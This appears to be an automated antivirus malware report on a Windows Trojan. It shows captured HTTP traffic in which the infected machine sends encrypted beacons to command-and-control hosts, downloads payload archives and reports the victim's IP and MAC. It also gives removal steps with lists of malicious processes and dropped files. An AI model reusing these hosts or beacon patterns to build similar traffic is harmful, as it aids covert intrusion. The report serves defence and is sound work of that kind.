POST /index.php?r=LPTemplar/Getinfo4HB&cpt=55273897013a499 HTTP/1.1
Accept: */*
Content-Type: application/x-www-form-urlencoded
User-Agent: MSDN Safa HTTP Retriever 1.0
Host: lpvoidray.lingpao8.com
Content-Length: 67
Cache-Control: no-cache

c=vspRJyBosa2r--IS0J8JXK4kkxGXh9WDFIgKy6k5-dG0N4E0gp2vtLAFKEs7jte

HTTP/1.1 200 OK
Date: Fri, 10 Apr 2015 10:22:16 GMT
Server: Apache
X-Powered-By: PHP/5.3.10-1ubuntu3.11
Content-Length: 103
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
55270258001a45811SZ98BewdTLWLqrkBWUsjtpB4n06IK6VWePRo30eadzKFrnBVWTZlo
EAReolTs6YjyQvDXHswRfAeSoxl8Dhw==..


GET /txt/ndis500_201504091903.txt?ver=3.180&uid=suibianle.0&lip=192.168.220.134&mac=000C293FC930&p=0&b=0.0.0.0.0&md5=535583357E136724F48460BECFCB6A6B HTTP/1.1
Accept: */*
Accept-Encoding: deflate
Accept-Language: zh-cn
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727;)
Host: kechuang.p2ptool.com
Connection: Close
Cache-Control: no-cache


HTTP/1.1 200 OK
Server: nginx
Date: Fri, 10 Apr 2015 10:23:23 GMT
Content-Type: text/plain
Content-Length: 340428
Last-Modified: Thu, 09 Apr 2015 11:03:30 GMT
Connection: close
ETag: "55265c82-531cc"
Accept-Ranges: bytes

<<< skipped >>>

GET /txt/listbc_20150409190211.txt?ver=3.180&uid=suibianle.0&lip=192.168.220.134&mac=000C293FC930&p=0&b=0.0.0.0.0&md5=692CBC266F24C5D3CF9780DA7F050725 HTTP/1.1
Accept: */*
Accept-Encoding: deflate
Accept-Language: zh-cn
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727;)
Host: kechuang.p2ptool.com
Connection: Close
Cache-Control: no-cache


HTTP/1.1 200 OK
Server: nginx
Date: Fri, 10 Apr 2015 10:23:17 GMT
Content-Type: text/plain
Content-Length: 682616
Last-Modified: Thu, 09 Apr 2015 11:02:13 GMT
Connection: close
ETag: "55265c35-a6a78"
Accept-Ranges: bytes

<<< skipped >>>

GET /txt/list666_20150402170229.txt?ver=3.180&uid=suibianle.0&lip=192.168.220.134&mac=000C293FC930&p=0&b=0.0.0.0.0&md5=D4C0145555BF9ACCC927AF2650770FED HTTP/1.1
Accept: */*
Accept-Encoding: deflate
Accept-Language: zh-cn
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727;)
Host: kechuang.p2ptool.com
Connection: Close
Cache-Control: no-cache


HTTP/1.1 200 OK
Server: nginx
Date: Fri, 10 Apr 2015 10:23:20 GMT
Content-Type: text/plain
Content-Length: 70804
Last-Modified: Thu, 02 Apr 2015 09:02:29 GMT
Connection: close
ETag: "551d05a5-11494"
Accept-Ranges: bytes

<<< skipped >>>

GET /Phoenix_20150202.php?UID=00000000_00000B4B&DATE=20150410 HTTP/1.1
User-Agent: MSDN Safa HTTP Retriever 1.0
Host: lpvoidray.lingpao8.com


HTTP/1.1 200 OK
Date: Fri, 10 Apr 2015 10:21:47 GMT
Server: Apache
X-Powered-By: PHP/5.3.10-1ubuntu3.11
Vary: Accept-Encoding
Content-Length: 1144
Connection: close
Content-Type: text/html


GET /Dragoon/20140618_L.zip HTTP/1.1
User-Agent: MSDN Safa HTTP Retriever 1.0
Host: p1.lingpao8.com


HTTP/1.1 200 OK
Content-Type: application/zip
Connection: keep-alive
Date: Thu, 09 Apr 2015 18:47:05 GMT
Cache-Control:  max-age=86400
Content-Length: 645070
Via: ccn-bj-h-5o4
Expires: Fri, 10 Apr 2015 18:47:05 GMT
Last-Modified: Tue, 10 Mar 2015 06:46:47 GMT
Server: nginx
CC_CACHE: TCP_HIT
Accept-Ranges: bytes

<<< skipped >>>

GET /Mule/20141125.zip HTTP/1.1
User-Agent: MSDN Safa HTTP Retriever 1.0
Host: p1.lingpao8.com


HTTP/1.1 200 OK
Content-Type: application/zip
Connection: keep-alive
Date: Thu, 09 Apr 2015 18:23:33 GMT
Cache-Control:  max-age=86400
Content-Length: 579171
Via: ccn-bj-h-5o2
Expires: Fri, 10 Apr 2015 18:23:33 GMT
Last-Modified: Tue, 25 Nov 2014 01:23:00 GMT
Server: nginx
CC_CACHE: TCP_HIT
Accept-Ranges: bytes

<<< skipped >>>

GET /txt/listtl_20150407141150.txt?ver=3.180&uid=suibianle.0&lip=192.168.220.134&mac=000C293FC930&p=0&b=0.0.0.0.0&md5=CD00E9BAA99F11C64A5F27BA8E8EC72C HTTP/1.1
Accept: */*
Accept-Encoding: deflate
Accept-Language: zh-cn
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727;)
Host: kechuang.p2ptool.com
Connection: Close
Cache-Control: no-cache


HTTP/1.1 200 OK
Server: nginx
Date: Fri, 10 Apr 2015 10:23:28 GMT
Content-Type: text/plain
Content-Length: 13284
Last-Modified: Tue, 07 Apr 2015 06:11:50 GMT
Connection: close
ETag: "55237526-33e4"
Accept-Ranges: bytes

<<< skipped >>>

GET /txt/qpqpqp_201504071411.txt?ver=3.180&uid=suibianle.0&lip=192.168.220.134&mac=000C293FC930&p=0&b=0.0.0.0.0&md5=943BDB56E3DD58E41FDB56A349DB6CBA HTTP/1.1
Accept: */*
Accept-Encoding: deflate
Accept-Language: zh-cn
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727;)
Host: kechuang.p2ptool.com
Connection: Close
Cache-Control: no-cache


HTTP/1.1 200 OK
Server: nginx
Date: Fri, 10 Apr 2015 10:23:24 GMT
Content-Type: text/plain
Content-Length: 101060
Last-Modified: Tue, 07 Apr 2015 06:11:35 GMT
Connection: close
ETag: "55237517-18ac4"
Accept-Ranges: bytes

<<< skipped >>>

GET /txt/miniIE_150328.txt?ver=3.180&uid=suibianle.0&lip=192.168.220.134&mac=000C293FC930&p=0&b=0.0.0.0.0&md5=5C6AF7F6153B48B9FA2A2663E2D9B114 HTTP/1.1
Accept: */*
Accept-Encoding: deflate
Accept-Language: zh-cn
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727;)
Host: kechuang.p2ptool.com
Connection: Close
Cache-Control: no-cache


HTTP/1.1 200 OK
Server: nginx
Date: Fri, 10 Apr 2015 10:23:27 GMT
Content-Type: text/plain
Content-Length: 1591992
Last-Modified: Sat, 28 Mar 2015 10:13:36 GMT
Connection: close
ETag: "55167ed0-184ab8"
Accept-Ranges: bytes

<<< skipped >>>

GET /pki/crl/products/WinIntPCA.crl HTTP/1.1
Accept: */*
User-Agent: Microsoft-CryptoAPI/5.131.2600.5512
Host: crl.microsoft.com
Connection: Keep-Alive
Cache-Control: no-cache
Pragma: no-cache


HTTP/1.1 200 OK
Content-Type: application/pkix-crl
Last-Modified: Mon, 05 Apr 2010 23:14:32 GMT
Accept-Ranges: bytes
ETag: "07ca8bf15d5ca1:0"
Server: Microsoft-IIS/8.5
VTag: 438436827000000000
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
X-Powered-By: ASP.NET
Content-Length: 528
Cache-Control: max-age=900
Date: Fri, 10 Apr 2015 10:23:46 GMT
Connection: keep-alive


GET /txt/listsf_20150409190438.txt?ver=3.180&uid=suibianle.0&lip=192.168.220.134&mac=000C293FC930&p=0&b=0.0.0.0.0&md5=C5C6AE13D23B73839E356DD658D8FFAB HTTP/1.1
Accept: */*
Accept-Encoding: deflate
Accept-Language: zh-cn
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727;)
Host: kechuang.p2ptool.com
Connection: Close
Cache-Control: no-cache


HTTP/1.1 200 OK
Server: nginx
Date: Fri, 10 Apr 2015 10:23:20 GMT
Content-Type: text/plain
Content-Length: 943400
Last-Modified: Thu, 09 Apr 2015 11:04:40 GMT
Connection: close
ETag: "55265cc8-e6528"
Accept-Ranges: bytes

<<< skipped >>>

POST /index.php?r=LPTemplar/Getinfo4SW&cpt=5527353c013a498 HTTP/1.1
Accept: */*
Content-Type: application/x-www-form-urlencoded
User-Agent: MSDN Safa HTTP Retriever 1.0
Host: lpvoidray.lingpao8.com
Content-Length: 67
Cache-Control: no-cache

c=xO_7kDPm4FROcTv6R28N5YbQO1O2KtW9kP2DYsoTitVi9U-qNmLhtXJdTrPDYee

HTTP/1.1 200 OK
Date: Fri, 10 Apr 2015 10:22:12 GMT
Server: Apache
X-Powered-By: PHP/5.3.10-1ubuntu3.11
Content-Length: 143
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
55270254001a4540w9emfEJxdMwOKAchrA8SW7BDRO2qVQYQWJ1RytBSz9dvigmyF-NlVR
YWV8AS3okz47sW9UvFCWHGtfuvZvoK3lRnZay3uNAj0RvH7OoLkXqw-fRSIBxZ4xomoTFX
2MO..


GET /txt/urlnav_141114.txt?ver=3.180&uid=suibianle.0&lip=192.168.220.134&mac=000C293FC930&p=0&b=0.0.0.0.0&md5=965923D00313F3B495AA8CE533ED63C9 HTTP/1.1
Accept: */*
Accept-Encoding: deflate
Accept-Language: zh-cn
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727;)
Host: kechuang.p2ptool.com
Connection: Close
Cache-Control: no-cache


HTTP/1.1 200 OK
Server: nginx
Date: Fri, 10 Apr 2015 10:23:17 GMT
Content-Type: text/plain
Content-Length: 111288
Last-Modified: Fri, 14 Nov 2014 03:29:19 GMT
Connection: close
ETag: "5465770f-1b2b8"
Accept-Ranges: bytes

<<< skipped >>>

The Trojan connects to the servers at the following location(s):

Explorer.EXE_880_rwx_00FF0000_00004000:

c:\windows\system\pjkni\wininit.exe
wmsvcrt
WinExec
ShellExecuteExA
ShellExecuteExW
OpenWindowStationA
OpenWindowStationW
SetProcessWindowStation
GetProcessWindowStation
CloseWindowStation
EnumWindows
EnumThreadWindows
EnumChildWindows
RegOpenKeyExA
RegOpenKeyExW
RegEnumKeyExA
RegEnumKeyExW
RegDeleteKeyA
RegDeleteKeyW
RegCloseKey
HttpOpenRequestA
HttpOpenRequestW
HttpEndRequestA
HttpEndRequestW
HttpQueryInfoA
HttpQueryInfoW
UrlUnescapeA
UrlUnescapeW


Remove it with Ad-Aware

  1. Click (here) to download and install Ad-Aware Free Antivirus.
  2. Update the definition files.
  3. Run a full scan of your computer.


Manual removal*

  1. Scan a system with an anti-rootkit tool.
  2. Terminate malicious process(es) (How to End a Process With the Task Manager):

    nvsvc32.exe:236
    ndis500.exe:1340
    %original file name%.exe:1360
    MiniIE.exe:2432
    ndsqp.exe:560
    tray.exe:2212
    iawbsms.exe:4008
    wininit.exe:1640

  3. Delete the original Trojan file.
  4. Delete or disinfect the following files created/modified by the Trojan:

    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\U9SDQR8D\20141125[1].zip (141890 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\U9SDQR8D\20140618_L[1].zip (160210 bytes)
    %Documents and Settings%\%current user%\Application Data\Microsoft\CryptnetUrlCache\MetaData\3130B1871A126520A8C47861EFE3ED4D (240 bytes)
    %Documents and Settings%\%current user%\Application Data\Microsoft\CryptnetUrlCache\Content\E04822AD18D472EA5B582E6E6F8C6B9A (528 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\U9SDQR8D\20150218[1].zip (26706 bytes)
    %WinDir%\revt\atune.exe (6342 bytes)
    %Documents and Settings%\%current user%\Application Data\Microsoft\CryptnetUrlCache\MetaData\E04822AD18D472EA5B582E6E6F8C6B9A (256 bytes)
    %Documents and Settings%\%current user%\Application Data\Microsoft\CryptnetUrlCache\Content\3130B1871A126520A8C47861EFE3ED4D (521 bytes)
    %System%\ndisweb_new.dat0 (8 bytes)
    %System%\ndisweb_new.dat1 (185 bytes)
    %System%\drivers\uniconfi.dat (4943 bytes)
    %System%\drivers\ZWebNds.sys (16 bytes)
    %System%\ndisweb.log (559 bytes)
    C:\ .bat (109 bytes)
    %WinDir%\system\pjkni\wininit.exe (74 bytes)
    %WinDir%\system\oathr\nvsvc32.exe (127 bytes)
    %WinDir%\WaO\exec\services.exe (4331 bytes)
    %WinDir%\WaO\MiniIE.txt (174412 bytes)
    %System%\tl.dat (9 bytes)
    %WinDir%\WaO\exec\tray.exe (7976 bytes)
    %System%\bc.dat (1792 bytes)
    %WinDir%\WaO\sys32\whitelist.txt (3 bytes)
    %WinDir%\WaO\First.txt (18796 bytes)
    %System%\tl.txt (676 bytes)
    %System%\ndsqp.txt (12588 bytes)
    %System%\safe.dat (3780 bytes)
    %WinDir%\WaO\sys32\whitelist.dat (2 bytes)
    %WinDir%\WaO\MiniIE.exe (7731 bytes)
    %System%\ndis500.txt (44948 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\kxxrdti.txt (3 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\eqoztij.txt (2105 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\cgcwmsq.txt (601 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\eaurlal.txt (601 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\vzszrtd.txt (10815 bytes)
    %WinDir%\WaO\iawbsms.exe (110 bytes)
    %WinDir%\WaO\flist.bin (1 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\miaofuk.txt (4545 bytes)
    %System%\bc.txt (88388 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\bwsostq.txt (673 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\tfijpnx.txt (601 bytes)
    %System%\ndis500.exe (255 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\waoiuoq.txt (10177 bytes)
    %WinDir%\WaO\sys32\urlnav.dll (83 bytes)
    %System%\lhc.txt (9476 bytes)
    %System%\ndsqp.exe (75 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\tzejock.txt (7345 bytes)
    %System%\safe.txt (122772 bytes)
    %System%\lhc.dat (53 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\ulmxeae.txt (13 bytes)
    %WinDir%\WaO\exec\tray.txt (188360 bytes)
    %System%\drivers\HideSys.sys (15 bytes)
    %WinDir%\WaO\sys32\urlnav.txt (14076 bytes)

  5. Clean the Temporary Internet Files folder, which may contain infected files (How to clean Temporary Internet Files folder).
  6. Reboot the computer.

*Manual removal may cause unexpected system behaviour and should be performed at your own risk.
